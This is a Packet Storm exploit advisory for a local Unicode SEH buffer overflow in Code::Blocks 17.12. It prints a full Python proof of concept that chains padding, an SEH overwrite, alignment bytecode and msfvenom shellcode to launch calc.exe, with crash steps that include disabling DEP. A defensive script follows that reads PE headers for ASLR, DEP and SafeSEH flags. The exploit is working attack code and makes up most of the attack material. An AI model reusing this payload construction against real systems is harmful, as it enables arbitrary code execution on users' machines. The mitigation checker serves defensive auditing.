Code Blocks 17.12 Local Buffer Overflow

Date: 18 Jun 2020 00:00:00
Reported by: Paras Bhatia
Type: packetstorm
Source: packetstormsecurity.com

Code Blocks 17.12 Local Buffer Overflow exploit

Code

```python
# Exploit Title: Code Blocks 17.12 - 'File Name' Local Buffer Overflow (Unicode) (SEH) (PoC)
# Vendor Homepage: http://www.codeblocks.org/
# Software Link Download: https://sourceforge.net/projects/codeblocks/files/Binaries/17.12/Windows/codeblocks-17.12-setup.exe/download
# Exploit Author: Paras Bhatia
# Discovery Date: 2020-06-16
# Vulnerable Software: Code Blocks
# Version: 17.12
# Vulnerability Type: Local Buffer Overflow
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)

#Steps to Produce the Crash:

# 1.- Run python code: codeblocks.py
# 2.- Copy content to clipboard
# 3.- Turn off DEP for codeblocks.exe
# 4.- Open "codeblocks.exe"
# 5.- Go to "File" > "New" > "Project..."
# 6.- Click on "Files" from left box > Select "C/C++ header" > Click on "Go" > Click on "Next"
# 7.- Paste ClipBoard into the "Filename with fullpath:" .
# 8.- Click on "Finish".
# 9.- Calc.exe runs.


#################################################################################################################################################

#Python "codeblocks.py" Code:

f= open("codeblocks.txt", "w")

junk1="A" * 2006


nseh="\x61\x62" #popad / align


#Found pop edi - pop ebp - ret at 0x005000E0 [codeblocks.exe] ** Unicode compatible ** ** Null byte ** [SafeSEH: ** NO ** - ASLR: ** No (Probably not) **] [Fixup: ** NO **] - C:\Program Files\CodeBlocks\codeblocks.exe
seh="\xe0\x50"

ven = "\x62" #align
ven +="\x53" #push ebx
ven += "\x62" #align
ven += "\x58" #pop eax
ven += "\x62" #align
ven += "\x05\x14\x11" #add eax, 0x11001400
ven += "\x62" #align
ven += "\x2d\x13\x11" #sub eax, 0x11001300
ven += "\x62" #align

ven += "\x50" #push eax
ven += "\x62" #align
ven += "\xc3" #ret

junk2="\x41" * 108 #required to make sure shellcode = eax

#msfvenom -p windows/exec cmd=calc.exe --platform windows -f py -e x86/unicode_mixed BufferRegister=EAX
buf = ""
buf += "\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += "\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += "\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += "\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += "\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += "\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += "\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += "\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += "\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += "\x47\x42\x39\x75\x34\x4a\x42\x59\x6c\x48\x68\x71\x72"
buf += "\x69\x70\x4b\x50\x49\x70\x73\x30\x53\x59\x69\x55\x50"
buf += "\x31\x49\x30\x33\x34\x62\x6b\x62\x30\x50\x30\x74\x4b"
buf += "\x42\x32\x6a\x6c\x62\x6b\x30\x52\x6d\x44\x74\x4b\x52"
buf += "\x52\x6c\x68\x5a\x6f\x34\x77\x6f\x5a\x4e\x46\x50\x31"
buf += "\x6b\x4f\x74\x6c\x4f\x4c\x6f\x71\x31\x6c\x6d\x32\x4c"
buf += "\x6c\x6f\x30\x56\x61\x66\x6f\x6a\x6d\x4b\x51\x69\x37"
buf += "\x67\x72\x48\x72\x42\x32\x6f\x67\x72\x6b\x52\x32\x5a"
buf += "\x70\x72\x6b\x70\x4a\x4d\x6c\x32\x6b\x6e\x6c\x5a\x71"
buf += "\x64\x38\x7a\x43\x31\x38\x4b\x51\x36\x71\x42\x31\x34"
buf += "\x4b\x30\x59\x4b\x70\x39\x71\x79\x43\x62\x6b\x6d\x79"
buf += "\x6b\x68\x6a\x43\x6c\x7a\x70\x49\x62\x6b\x50\x34\x52"
buf += "\x6b\x59\x71\x69\x46\x4c\x71\x79\x6f\x34\x6c\x65\x71"
buf += "\x46\x6f\x4c\x4d\x7a\x61\x76\x67\x70\x38\x6b\x30\x30"
buf += "\x75\x6c\x36\x79\x73\x63\x4d\x49\x68\x6d\x6b\x31\x6d"
buf += "\x6f\x34\x63\x45\x67\x74\x6e\x78\x54\x4b\x72\x38\x6c"
buf += "\x64\x4b\x51\x77\x63\x71\x56\x74\x4b\x6a\x6c\x6e\x6b"
buf += "\x64\x4b\x32\x38\x4b\x6c\x6a\x61\x38\x53\x74\x4b\x6b"
buf += "\x54\x34\x4b\x4a\x61\x68\x50\x44\x49\x4e\x64\x6f\x34"
buf += "\x4c\x64\x51\x4b\x4f\x6b\x53\x31\x6e\x79\x71\x4a\x32"
buf += "\x31\x79\x6f\x69\x50\x4f\x6f\x4f\x6f\x4f\x6a\x64\x4b"
buf += "\x6e\x32\x58\x6b\x54\x4d\x6f\x6d\x30\x6a\x4b\x51\x64"
buf += "\x4d\x45\x35\x55\x62\x49\x70\x4d\x30\x4d\x30\x72\x30"
buf += "\x73\x38\x4d\x61\x52\x6b\x72\x4f\x54\x47\x79\x6f\x66"
buf += "\x75\x75\x6b\x68\x70\x35\x65\x45\x52\x6f\x66\x4f\x78"
buf += "\x73\x76\x56\x35\x75\x6d\x35\x4d\x79\x6f\x69\x45\x4d"
buf += "\x6c\x79\x76\x43\x4c\x6b\x5a\x45\x30\x59\x6b\x57\x70"
buf += "\x34\x35\x49\x75\x57\x4b\x6e\x67\x4e\x33\x32\x52\x52"
buf += "\x4f\x71\x5a\x49\x70\x51\x43\x6b\x4f\x69\x45\x62\x43"
buf += "\x43\x31\x52\x4c\x33\x33\x4e\x4e\x31\x55\x31\x68\x53"
buf += "\x35\x6d\x30\x41\x41"




junk3 = "\x62" * 5000 #padding to crash



payload = junk1 + nseh + seh + ven + junk2 + buf +junk3

f.write(payload)
f.close()
```
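The PoC above only works because of absent mitigations: the gadget comment records that codeblocks.exe is loaded with neither SafeSEH nor ASLR, and step 3 has the tester switch DEP off for the process. The practical question for anyone shipping or deploying a 32-bit Windows binary is whether it opts into those protections, which is recorded in the PE headers. The following Python 3 script is an added example, not code from the advisory or from the Code::Blocks project: it reads the DllCharacteristics flags (DYNAMIC_BASE for ASLR, NX_COMPAT for DEP, GUARD_CF, NO_SEH) and follows the Load Configuration directory to see whether a non-empty SafeSEH handler table exists. Offsets follow the Microsoft PE/COFF specification. The image it inspects is a minimal PE32 constructed in memory so the script runs offline; it is not the real codeblocks.exe, and the handler table RVA inside it is a placeholder.

```python
import struct

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits (PE/COFF spec).
DYNAMIC_BASE = 0x0040   # image may be relocated: ASLR opt-in
NX_COMPAT = 0x0100      # image is DEP-compatible
NO_SEH = 0x0400         # image uses no structured exception handlers
GUARD_CF = 0x4000       # Control Flow Guard
LOAD_CONFIG_INDEX = 10  # data-directory slot of IMAGE_LOAD_CONFIG_DIRECTORY


def _u16(b, off):
    return struct.unpack_from("<H", b, off)[0]


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0]


def check_mitigations(data):
    """Return which exploit mitigations a PE32 (32-bit) image opts into."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    pe = _u32(data, 0x3C)                      # e_lfanew
    if data[pe:pe + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = pe + 4
    nsections = _u16(data, coff + 2)
    opt_size = _u16(data, coff + 16)
    opt = coff + 20                            # optional header start
    if _u16(data, opt) != 0x10B:
        raise ValueError("only PE32 images are handled here")
    dllchar = _u16(data, opt + 70)

    # Section table follows the optional header; needed to map RVAs to file offsets.
    sections = []
    for i in range(nsections):
        s = opt + opt_size + i * 40
        vsize, va, rawsize, rawptr = struct.unpack_from("<IIII", data, s + 8)
        sections.append((va, max(vsize, rawsize), rawptr))

    def rva_to_off(rva):
        for va, size, rawptr in sections:
            if va <= rva < va + size:
                return rawptr + (rva - va)
        return None

    # SafeSEH: Load Config must exist and carry a non-empty SEHandlerTable (+64) / SEHandlerCount (+68).
    safeseh = False
    if _u32(data, opt + 92) > LOAD_CONFIG_INDEX:        # NumberOfRvaAndSizes
        lc_rva, _lc_size = struct.unpack_from("<II", data, opt + 96 + 8 * LOAD_CONFIG_INDEX)
        lc_off = rva_to_off(lc_rva) if lc_rva else None
        if lc_off is not None and _u32(data, lc_off) >= 72:   # struct large enough to hold the SEH fields
            table, count = struct.unpack_from("<II", data, lc_off + 64)
            safeseh = table != 0 and count != 0
    return {
        "aslr": bool(dllchar & DYNAMIC_BASE),
        "dep": bool(dllchar & NX_COMPAT),
        "safeseh": safeseh,
        "no_seh": bool(dllchar & NO_SEH),
        "cfg": bool(dllchar & GUARD_CF),
    }


def missing_mitigations(data):
    """Names of the three protections the SEH overwrite above depends on being absent."""
    found = check_mitigations(data)
    return sorted(k for k in ("aslr", "dep", "safeseh") if not found[k])


def build_sample_pe(dllchar, safeseh):
    """Constructed minimal PE32 image with one .rdata section (test input, not a real binary)."""
    sec_va, sec_raw, sec_len = 0x1000, 0x200, 0x200
    section = bytearray(sec_len)
    lc_rva = lc_size = 0
    if safeseh:
        lc = bytearray(0x48)                        # IMAGE_LOAD_CONFIG_DIRECTORY32 with SEH fields
        struct.pack_into("<I", lc, 0, 0x48)         # Size
        struct.pack_into("<II", lc, 64, sec_va + 0x100, 1)  # placeholder table RVA, one handler
        section[:0x48] = lc
        lc_rva, lc_size = sec_va, 0x48
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x102)  # i386, 1 section, EXE|32BIT
    opt = bytearray(224)
    struct.pack_into("<H", opt, 0, 0x10B)                        # PE32 magic
    struct.pack_into("<I", opt, 28, 0x400000)                    # ImageBase
    struct.pack_into("<H", opt, 68, 2)                           # Subsystem: Windows GUI
    struct.pack_into("<H", opt, 70, dllchar)
    struct.pack_into("<I", opt, 92, 16)                          # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8 * LOAD_CONFIG_INDEX, lc_rva, lc_size)
    sec_hdr = b".rdata".ljust(8, b"\0") + struct.pack(
        "<IIIIIIHHI", sec_len, sec_va, sec_len, sec_raw, 0, 0, 0, 0, 0x40000040)
    hdr = dos + b"PE\0\0" + coff + opt + sec_hdr
    return bytes(hdr.ljust(sec_raw, b"\0") + section)


if __name__ == "__main__":
    weak = build_sample_pe(0, False)
    hardened = build_sample_pe(DYNAMIC_BASE | NX_COMPAT | GUARD_CF, True)
    print("weak image lacks:", missing_mitigations(weak))
    print("hardened image lacks:", missing_mitigations(hardened))
```

To audit a real binary, replace the constructed image with `open(path, "rb").read()`; a result listing `safeseh` and `aslr` as missing is exactly the condition the gadget comment in the PoC describes, and a missing `dep` flag means the process will run without DEP unless system policy forces it on.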
